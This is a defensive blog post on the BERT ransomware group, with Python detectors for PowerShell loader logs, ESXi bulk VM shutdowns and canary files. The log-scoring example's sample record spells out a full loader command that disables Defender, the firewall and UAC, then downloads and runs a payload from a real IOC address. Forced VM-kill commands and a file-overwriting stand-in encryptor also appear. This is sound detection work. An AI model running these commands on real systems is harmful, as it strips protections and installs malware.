BERT Ransomware: Trend Micro Uncovers a Fast-Moving Threat Targeting Healthcare, Tech, and More
In the relentless chess game between cyber defenders and digital criminals, a new player just flipped the board—and it’s moving faster than most teams can respond. Meet BERT, the latest ransomware group flagged by Trend Micro, and a wake-up call for anyone managing security in critical sectors like healthcare, technology, and event services. If you think ransomware is an “old threat” with predictable patterns, BERT is here to prove otherwise.
What sets this group apart isn’t sophisticated code or exotic exploits; it’s speed, simplicity, and ruthless efficiency. If your organization touches Windows or Linux systems—and let’s be real, whose doesn’t?—this is one threat you can’t afford to ignore.
Let’s break down what makes BERT so dangerous, what Trend Micro uncovered, and—most importantly—how you can proactively shield your organization from becoming the next headline.
What Is BERT Ransomware? Understanding the Threat Actor Behind Water Pombero
First, a little context: The cybersecurity world is constantly tracking new threat actors. BERT is the name of a ransomware group Trend Micro has been monitoring since April 2024; Trend Micro also tracks the intrusion set as "Water Pombero." Despite the friendly name, this BERT is no joke.
A Global Campaign Across Critical Industries
- Geographic Reach: Asia, Europe, and the US are all in BERT’s crosshairs.
- Target Sectors: Healthcare, technology, and event services are at the highest risk. Think hospitals, tech companies, and even event management platforms—places where downtime can be catastrophic.
- Systems Targeted: Both Windows and Linux environments, including virtualized infrastructure running VMware ESXi.
Here’s why that matters: A group attacking both major operating systems and critical industries is poised to cause maximum disruption. That’s not just theoretical; it’s happening right now.
How Does BERT Ransomware Work? Tactics and Tools Explained
BERT stands out not by reinventing the ransomware wheel, but by stripping things down to the essentials—and executing them with lightning speed. Let’s unpack their playbook.
Attacking Windows Systems: Simple Scripts, Devastating Impact
When targeting Windows, BERT leverages:
- Straightforward Code Structure: The ransomware uses simple string matching to identify and terminate specific processes. There is no obfuscation and no anti-analysis trickery.
- PowerShell Loader Script: Trend Micro found a PowerShell script that stages the ransomware payload. The script:
  - elevates to administrator privileges
  - disables Windows Defender
  - turns off the Windows Firewall
  - disables User Account Control (UAC)
  - downloads the ransomware from a remote host and runs it; the address, defanged, is 185[.]100[.]157[.]74
- Unclear Initial Access: Trend Micro has not determined how BERT first gets in. The usual suspects for a group like this are phishing, exploitation of unpatched internet-facing services, and brute-forced or reused credentials, but none of these is confirmed for BERT.
Why does such a plain script work? Because every step uses built-in, signed Windows tooling (powershell.exe, Set-MpPreference, netsh, the registry) that also runs in countless legitimate admin sessions. Each action is loud if anyone is looking: switching off real-time protection is logged by Defender, the firewall state change is logged, and the UAC change is a registry write to a well-known key. The loader succeeds in environments that never enabled PowerShell script block logging, let ordinary users keep local admin rights, and have nobody watching those events.
Attacking Linux Systems: Fast, Multi-Threaded Encryption
BERT’s approach to Linux is a masterclass in efficiency:
- 50 Concurrent Threads: The ransomware encrypts files across the system using 50 threads simultaneously. That means an attack can lock down an entire server in minutes.
- ESXi Virtual Machine Shutdown: BERT can identify and forcefully power down VMware ESXi virtual machines, which are widely used in data centers to host multiple virtual servers.
- Minimal Detection Window: The binary is plain and the approach is brute force; rather than hide, BERT tries to finish before anyone reacts. A file-activity or CPU alarm that fires after five minutes fires after the damage is done.
Let me be clear: Virtual environments are often viewed as “safer.” BERT shatters that illusion. If you run VMs for critical operations, you need eyes on this threat.
Why BERT Ransomware Is So Dangerous: Low-Code, High Impact
You might wonder: If BERT doesn’t use advanced techniques, what makes it so scary? In cybersecurity, speed kills. BERT’s “low-code” approach means:
- Fewer Heuristic Triggers: Endpoint protection that keys on packers, obfuscation or unusual binaries has little to fire on when the tooling is plain scripts and a simple encryptor.
- Rapid Execution: The less complicated the attack chain, the less time defenders have to react.
- Easy for Attackers to Use: The barrier to entry is low, meaning even inexperienced actors can deploy BERT effectively.
- Constant Evolution: The developers are continuously updating and improving the ransomware, making it harder for static defenses to keep up.
As Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting, explains:
“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder.”
Simply put: BERT doesn’t need to be sophisticated if it’s faster and more adaptable than your security team.
Real-World Impacts: Who’s in the Crosshairs?
While BERT’s campaign is global, certain industries and systems face outsized risks:
- Healthcare: Hospitals can’t afford downtime—lives literally hang in the balance. And with many relying on legacy systems, they’re prime targets.
- Technology: IT and SaaS providers often act as supply-chain conduits; a breach here can cascade downstream.
- Event Services: From major ticketing systems to online conference platforms, event businesses increasingly rely on digital infrastructure.
A cautionary note: Even if your organization doesn’t fit these categories, BERT’s methods exploit universal weaknesses: poor password hygiene, inadequate monitoring, and lax privilege controls.
The Rise of New Ransomware Models: BERT Isn’t Alone
BERT is part of a broader trend: a new wave of ransomware groups embracing speed, simplicity, and modularity over heavy obfuscation. Recent examples include:
Gunra Ransomware
- Spotted in April 2024
- Appends the .encrt extension to encrypted files
- Drops ransom notes named r3adm3.txt
- Targets: healthcare, electronics, beverage manufacturing
Silent Ransom Group
- Specializes in callback phishing emails
- Masquerades as legitimate businesses
- Steals sensitive data first, then delivers ransom demands
Mamona Ransomware
- Hybrid model: Quick attacks, often operating offline
- Deletes traces post-execution, making forensics difficult
“Loud-Lockers” vs. “Quiet Siphoners”
Sanchit Vir Gogia, chief analyst at Greyhound Research, sums up the trend:
“CISOs are now contending with ‘loud-lockers’ like Gunra that use multithreading and anti-recovery routines to lock down systems instantly, and ‘quiet siphoners’ like Silent Ransom who avoid malware entirely. Groups like Mamona represent a third hybrid—quick but malware-light, often operating offline and deleting traces post-execution.”
This evolution demands not only traditional antivirus or EDR but layered, flexible, and proactive defense strategies.
How to Defend Against BERT Ransomware: Practical Steps for Security Teams
If you’re a CISO, SOC lead, or IT manager, you’re probably wondering: “What can we actually do to stop BERT and similar threats?” Here’s a battle-tested checklist for modern ransomware defense:
1. Monitor PowerShell and Admin Activity
- Turn on PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) so you see the decoded script content, not just that powershell.exe started.
- Flag unusual PowerShell sessions, especially those that download remote code or disable security features; a single script that tampers with Defender, the firewall and UAC is a high-confidence alert, not a warning.
- Watch for User Account Control (UAC) bypass attempts and for changes to the EnableLUA registry value.
- Audit admin privilege usage and restrict it where possible.
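The following is an added example, written for this article and not taken from the original post or from Trend Micro's report, that turns checklist item 1 and the Windows loader behaviour described earlier (elevation, Defender, firewall and UAC disabled, payload fetched from a remote IP) into runnable detection logic. It scores PowerShell Script Block Logging records (Event ID 4104) against a short indicator list and refangs the defanged address from the report so the known IOC can be matched. The event records, hostnames, user names and the payload path are constructed for the demo; the indicator weights and the alert threshold are assumptions, tuned so that one download on its own does not page anyone but the combination the loader needs does.

```python
import re
from ipaddress import ip_address

# Constructed sample Script Block Logging records (Windows Event ID 4104).
# Not real captured logs: hostnames, users and the payload path are invented; the
# second record imitates the loader behaviour the report describes.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "user": "CORP\\jdoe", "event_id": 4104,
     "script": "Get-Service -Name Spooler | Restart-Service"},
    {"host": "SRV-APP-02", "user": "CORP\\svc_backup", "event_id": 4104,
     "script": (
         "Start-Process powershell -Verb RunAs -ArgumentList '-ep bypass -w hidden';"
         "Set-MpPreference -DisableRealtimeMonitoring $true;"
         "netsh advfirewall set allprofiles state off;"
         "Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System EnableLUA 0;"
         "(New-Object Net.WebClient).DownloadFile('http://185.100.157.74/payload.exe', \"$env:TEMP\\p.exe\");"
         "Start-Process \"$env:TEMP\\p.exe\""
     )},
    {"host": "WS-HR-11", "user": "CORP\\ops", "event_id": 4104,
     "script": "Invoke-WebRequest https://download.example.com/agent.msi -OutFile agent.msi"},
]

# (indicator name, pattern, weight). Weights are an assumption for this demo: a lone
# download is everyday admin activity (weight 1); disabling Defender is not (weight 3).
INDICATORS = [
    ("elevation",        re.compile(r"-Verb\s+RunAs", re.I), 2),
    ("policy_bypass",    re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    ("hidden_window",    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("defender_disable", re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$true", re.I), 3),
    ("firewall_off",     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I), 2),
    ("uac_disable",      re.compile(r"EnableLUA\b.{0,40}?\b0\b", re.I), 2),
    ("remote_download",  re.compile(r"\b(?:DownloadFile|DownloadString|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b", re.I), 1),
]
IOC_WEIGHT = 5        # contact with a known-bad address alerts on its own
ALERT_THRESHOLD = 3   # assumption: roughly two defence-tampering style hits


def refang(ioc: str) -> str:
    """Turn a defanged indicator (185[.]100[.]157[.]74, hxxp://) back into its real form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


KNOWN_IOC_IPS = {refang("185[.]100[.]157[.]74")}   # the address named in the report


def extract_ips(text: str) -> set:
    """Return syntactically valid IPv4 addresses found anywhere in the script text."""
    found = set()
    for candidate in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text):
        try:
            ip_address(candidate)
            found.add(candidate)
        except ValueError:
            pass
    return found


def analyze_event(event: dict, ioc_ips: set = KNOWN_IOC_IPS) -> dict:
    """Score one 4104 record: which indicators fired, total weight, any known IOC contacted."""
    text = event["script"]
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    iocs = sorted(extract_ips(text) & ioc_ips)
    if iocs:
        score += IOC_WEIGHT
    return {"host": event["host"], "user": event["user"], "hits": hits, "score": score, "iocs": iocs}


def triage(events, ioc_ips: set = KNOWN_IOC_IPS, threshold: int = ALERT_THRESHOLD) -> list:
    """Return the records worth paging on: score at or over threshold, or any IOC match."""
    results = (analyze_event(e, ioc_ips) for e in events if e.get("event_id") == 4104)
    return [r for r in results if r["score"] >= threshold or r["iocs"]]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']} score={alert['score']} hits={alert['hits']} iocs={alert['iocs']}")
```

Run against the constructed records, only the SRV-APP-02 script alerts; the Spooler restart scores zero and the plain Invoke-WebRequest scores 1. In production the records come from your SIEM's 4104 feed rather than a list, and the pattern list should grow with what you see in incident reviews, but the shape stays the same: weight the individual actions, and alert on the combination rather than on any one of them.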
2. Lock Down Virtual Environments
- Monitor ESXi and vCenter logs for bulk VM shutdowns or unusual activity: several power-off or forced-kill operations on one host within a couple of minutes is not a maintenance pattern.
- Isolate management interfaces from the main network.
- Limit who has access to hypervisor controls.
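An added example, not from the original post or from Trend Micro, that implements the "bulk VM shutdown" detection in item 2 and matches the Linux behaviour described earlier (BERT powering down ESXi VMs before encrypting). The VM lifecycle events and shell history entries are constructed and already normalised; real hostd or vCenter lines must first go through your SIEM parser. The forced-kill pattern looks for esxcli vm process kill with --type=force, which is the usual shell-level way to do what the report describes; whether BERT issues exactly that command is not stated on this page, so treat that check as an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed, already-normalised VM lifecycle events: (timestamp, ESXi host, VM name, action).
# Not real hostd/vCenter log lines; the field split is whatever your SIEM parser produces.
SAMPLE_VM_EVENTS = [
    ("2025-07-01T02:00:05Z", "esx01", "db-prod-01", "power_off"),   # routine maintenance, hours earlier
    ("2025-07-01T09:15:00Z", "esx01", "web-01",     "power_off"),
    ("2025-07-01T09:15:02Z", "esx01", "web-02",     "power_off"),
    ("2025-07-01T09:15:03Z", "esx01", "db-prod-01", "power_off"),
    ("2025-07-01T09:15:05Z", "esx01", "erp-01",     "power_off"),
    ("2025-07-01T09:15:06Z", "esx01", "fileshare",  "power_off"),
    ("2025-07-01T09:15:09Z", "esx02", "backup-01",  "power_off"),
    ("2025-07-01T11:00:00Z", "esx02", "test-vm",    "power_on"),
]

# Constructed ESXi shell history entries: (timestamp, host, command line).
SAMPLE_SHELL_HISTORY = [
    ("2025-07-01T09:14:58Z", "esx01", "esxcli vm process list"),
    ("2025-07-01T09:14:59Z", "esx01", "esxcli vm process kill --type=force --world-id=2100123"),
    ("2025-07-01T09:15:01Z", "esx01", "esxcli vm process kill --type=force --world-id=2100456"),
    ("2025-07-01T10:30:00Z", "esx02", "esxcli storage core device list"),
]

# Assumption: forced kills are the encryptor's way to free locked VM disks; admins rarely need them.
FORCED_KILL = re.compile(r"esxcli\s+vm\s+process\s+kill\b.*--type[= ]force", re.I)


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_bulk_poweroff(events, min_vms: int = 5, window_seconds: int = 120) -> list:
    """Alert once per burst when >= min_vms distinct VMs are powered off on one host inside the window."""
    alerts = []
    recent = defaultdict(deque)   # host -> deque of (timestamp, vm) inside the sliding window
    alerted = set()               # hosts already reported for the current burst
    for ts, host, vm, action in sorted(events, key=lambda e: e[0]):
        if action != "power_off":
            continue
        now = parse_ts(ts)
        window = recent[host]
        while window and (now - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if not window:
            alerted.discard(host)  # quiet period passed: a later burst may alert again
        window.append((now, vm))
        vms = {v for _, v in window}
        if len(vms) >= min_vms and host not in alerted:
            alerted.add(host)
            alerts.append({"host": host, "vm_count": len(vms), "vms": sorted(vms),
                           "first": window[0][0].isoformat(), "last": now.isoformat()})
    return alerts


def flag_forced_kills(shell_history) -> list:
    """Return shell entries that force-kill a VM process."""
    return [(ts, host, cmd) for ts, host, cmd in shell_history if FORCED_KILL.search(cmd)]


if __name__ == "__main__":
    for a in detect_bulk_poweroff(SAMPLE_VM_EVENTS):
        print(f"BULK POWER-OFF on {a['host']}: {a['vm_count']} VMs between {a['first']} and {a['last']}: {a['vms']}")
    for ts, host, cmd in flag_forced_kills(SAMPLE_SHELL_HISTORY):
        print(f"FORCED KILL on {host} at {ts}: {cmd}")
```

On the sample data the 02:00 power-off is aged out of the window before the 09:15 burst starts, so esx01 alerts exactly once with five VMs and esx02, with a single power-off, does not. Tune min_vms and window_seconds to your own maintenance windows; the point of the sliding window is that the threshold counts distinct VMs in a short period, not power-offs per day.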
3. Deploy Canary Files as Tripwires
- Set up decoy files across critical endpoints and servers.
- Alert on any access or modification—since ransomware typically “touches” everything it can.
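The canary idea in item 3, as an added example in Python that is not from the original post: plant decoy files with a hash baseline, then check whether any has been modified, renamed or removed, and run a stand-in encryptor to show the tripwire firing. The decoy names and the ".locked" extension the simulation appends are invented for this demo and are not BERT indicators.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Decoy names chosen to look like something a ransomware sweep or a curious intruder will touch.
# Invented for this demo; use names that blend into your own file shares.
CANARY_NAMES = ["~$Q3_payroll_export.xlsx", "passwords_backup_DO_NOT_DELETE.txt", ".credentials.db"]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plant_canaries(root: Path) -> dict:
    """Create the decoys and return the baseline manifest {name: {"sha256", "size"}}."""
    root.mkdir(parents=True, exist_ok=True)
    manifest = {}
    for name in CANARY_NAMES:
        path = root / name
        path.write_bytes(os.urandom(4096))   # random filler: unique per host, worthless if stolen
        manifest[name] = {"sha256": sha256_of(path), "size": path.stat().st_size}
    return manifest


def check_canaries(root: Path, manifest: dict) -> list:
    """Compare the directory with the baseline. Any deviation is an alert, never a warning."""
    alerts = []
    present = {p.name for p in root.iterdir()} if root.exists() else set()
    for name, expected in manifest.items():
        path = root / name
        if not path.exists():
            # Encryptors usually rename as they go; report the new name if it is still recognisable.
            renamed_to = sorted(n for n in present if n.startswith(name) and n != name)
            alerts.append({"canary": name, "event": "renamed" if renamed_to else "missing",
                           "now": renamed_to})
        elif sha256_of(path) != expected["sha256"]:
            alerts.append({"canary": name, "event": "modified",
                           "size_before": expected["size"], "size_after": path.stat().st_size})
    return alerts


def simulate_encryptor(root: Path, extension: str = ".locked") -> None:
    """Stand-in for what an encryptor does to a directory: overwrite contents, append an extension.
    The extension is hypothetical, not a BERT indicator."""
    for path in list(root.iterdir()):
        if path.is_file():
            path.write_bytes(os.urandom(path.stat().st_size + 16))  # "ciphertext" plus a footer
            path.rename(path.with_name(path.name + extension))


def demo() -> tuple:
    """Plant, verify clean, run the fake encryptor, verify again. Returns both alert lists."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "canaries"
        manifest = plant_canaries(root)
        clean = check_canaries(root, manifest)
        simulate_encryptor(root)
        tripped = check_canaries(root, manifest)
    return clean, tripped


if __name__ == "__main__":
    clean, tripped = demo()
    print("baseline alerts:", clean)
    for a in tripped:
        print("ALERT", a)
```

The check is only as fast as how often it runs, so schedule it every minute or two (or hook the canary directory into your EDR's file-integrity monitoring) and wire the alert to host isolation rather than to an inbox. Keep the manifest off the host: a baseline stored next to the decoys is overwritten along with them.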
4. Enforce PowerShell Constrained Language Mode and Just-in-Time Admin
- Constrained Language Mode blocks the .NET and COM calls that loaders lean on (for example New-Object Net.WebClient). It only holds when it is enforced by an AppLocker or Windows Defender Application Control policy; setting LanguageMode inside a session is a preference an attacker can undo.
- Just-in-time admin privileges: Grant elevated access only when it is needed and revoke it immediately after, so a loader running as an ordinary user has nothing to elevate into.
5. Layered Security Architecture
- Use EDR/XDR solutions that correlate process, script and network activity instead of judging files in isolation.
- Segment your network to prevent lateral movement.
- Strict privilege controls: Apply the principle of least privilege everywhere.
6. Backup Strategy
- Maintain isolated, regularly tested backups that the accounts used for day-to-day administration cannot delete or encrypt; attackers who reach backup credentials destroy backups before they encrypt anything.
- Encrypt backups and store them offline or in immutable cloud storage.
- Test restores routinely to ensure they work under pressure.
7. Patch and Harden Systems
- Patch vulnerabilities quickly—especially internet-facing services.
- Disable unused services and accounts
- Implement application allowlisting to control what can execute on endpoints.
8. Phishing and Awareness Training
- Educate employees to spot phishing emails and social engineering tactics.
- Test with simulated attacks to reinforce muscle memory.
9. Proactive Threat Hunting and Incident Response Planning
- Conduct regular threat hunts for early indicators of compromise.
- Scripted playbooks for rapid containment—aim for response within 15 minutes of detection.
10. Assume Breaches Will Happen
- Prepare for fast detection and response, not just prevention.
- Review incident response plans regularly and run tabletop exercises.
Want more on ransomware response? The CISA Ransomware Guide is an excellent, actionable resource.
Expert Insights: Why Fast, Simple Ransomware Is the New Normal
Many organizations assume advanced attacks require advanced defenses. But as recent events show, even “low-code” ransomware like BERT can topple enterprise security postures. Here’s what the experts recommend:
- Prioritize containment over total prevention: Accept that dedicated attackers will get in—your focus should be limiting the damage.
- Automate detection and isolation workflows—speed is your friend.
- Invest in deception and process forensics: Leaving digital “boobytraps” (canary files, decoy accounts, honeypots) can buy precious time.
- Upgrade from legacy AV to integrated EDR/XDR: These platforms can correlate behaviors across endpoints, servers, cloud, and network traffic.
Above all, focus on organizational readiness. Even the best tech won’t help if your team can’t respond fast.
Frequently Asked Questions About BERT Ransomware
Q: What is BERT ransomware and why is it a threat?
A: BERT is a ransomware group tracked by Trend Micro since April 2024, targeting critical sectors across Asia, Europe, and the US. It stands out for its speed, simplicity, and ability to disable defenses rapidly—making it a major risk for organizations running Windows or Linux systems.
Q: How does BERT ransomware gain access to systems?
A: The exact initial access vector isn’t confirmed, but likely methods include phishing emails, exploiting unpatched vulnerabilities, or brute-forcing weak passwords. Once inside, it uses PowerShell scripts and privilege escalation to deploy the payload.
Q: How does BERT ransomware affect virtual machines?
A: On Linux systems, BERT can forcibly shut down ESXi virtual machines before encrypting their data—making recovery far more complicated for organizations that rely on virtualization.
Q: What steps can companies take to prevent BERT ransomware attacks?
A: Key steps include monitoring PowerShell activity, enforcing least privilege, segmenting networks, patching vulnerabilities, maintaining isolated backups, deploying EDR/XDR tools, educating staff, and having an incident response plan in place.
Q: Where can I learn more about ransomware defense best practices?
A: Authoritative resources include CISA’s Ransomware Guide, Trend Micro’s threat intelligence, and Microsoft’s security documentation.
Key Takeaways: How to Stay Ahead of Fast-Moving Ransomware Like BERT
The cybersecurity landscape is shifting—attackers no longer need elaborate malware to cause real damage. BERT proves that speed, adaptability, and exploiting common misconfigurations can outpace even well-resourced security teams.
If you remember one thing:
Prepare for fast, low-code ransomware attacks by investing in layered, proactive, and well-practiced defense strategies. Monitor aggressively, restrict privileges, isolate backups, and automate your response. Assume breaches will happen—and make sure your team can move just as fast as the attackers.
Stay safe, stay vigilant, and never underestimate the power of simple—but smart—adversaries in the evolving world of ransomware.
Discover more at InnoVirtuoso.com